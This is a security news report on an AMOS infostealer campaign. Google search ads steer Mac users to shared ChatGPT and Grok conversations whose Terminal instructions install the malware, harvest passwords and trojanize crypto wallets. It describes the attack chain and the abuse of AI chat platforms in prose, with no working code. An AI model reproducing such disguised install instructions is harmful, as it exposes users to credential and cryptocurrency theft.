Google Ads For Shared Chatgpt, Grok Guides Push Macos Infostealer...

A new AMOS infostealer campaign is abusing Google search ads to lure users into Grok and ChatGPT conversations that appear to offer “helpful” instructions but ultimately lead to installing the AMOS info-stealing malware on macOS.

The campaign was first spotted by researchers at cybersecurity company Kaspersky yesterday, while Huntress managed security platform published a more detailed report earlier today.

The ClickFix attack begins with victims searching for macOS-related terms, such as maintenance questions, problem-solving, or for Atlas - OpenAI's AI-powered web browser for macOS.

Google advertisement link directly to ChatGPT and Grok conversations that had been publicly shared in preparation for the attack. The chats are hosted on the legitimate LLM platforms and contain the malicious instructions used to install the malware.

"During our investigation, the Huntress team reproduced these poisoned results across multiple variations of the same question, 'how to clear data on iMac,' 'clear system data on iMac,' 'free up storage on Mac,' confirming this isn't an isolated result but a deliberate, widespread poisoning campaign targeting common troubleshooting queries," Huntress researchers explain.

If users fall for the trick and execute the commands from the AI chat in macOS Terminal, a base64-encoded URL decodes into a bash script (update) that loads a fake password prompt dialog.

When the password is provided, the script validates, stores, and uses it to execute privileged commands, such as downloading the AMOS infostealer and executing the malware with root-level privileges.

AMOS was first documented in April 2023. It is a malware-as-a-service (MaaS) operation that rents the infostealer $1,000/month, targeting macOS systems exclusively.

Earlier this year, AMOS added a backdoor module that lets operators execute commands on infected hosts, log key strokes, and drop additional payloads.

AMOS is dropped on /Users/$USER/ as a hidden file (.helper). When launched, it scans the applications folder for Ledger Wallet and Trezor Suite. If found, it overwrites them with trojanized versions that prompt the victim to enter their seed phrase "for security" reasons.

Source: BleepingComputer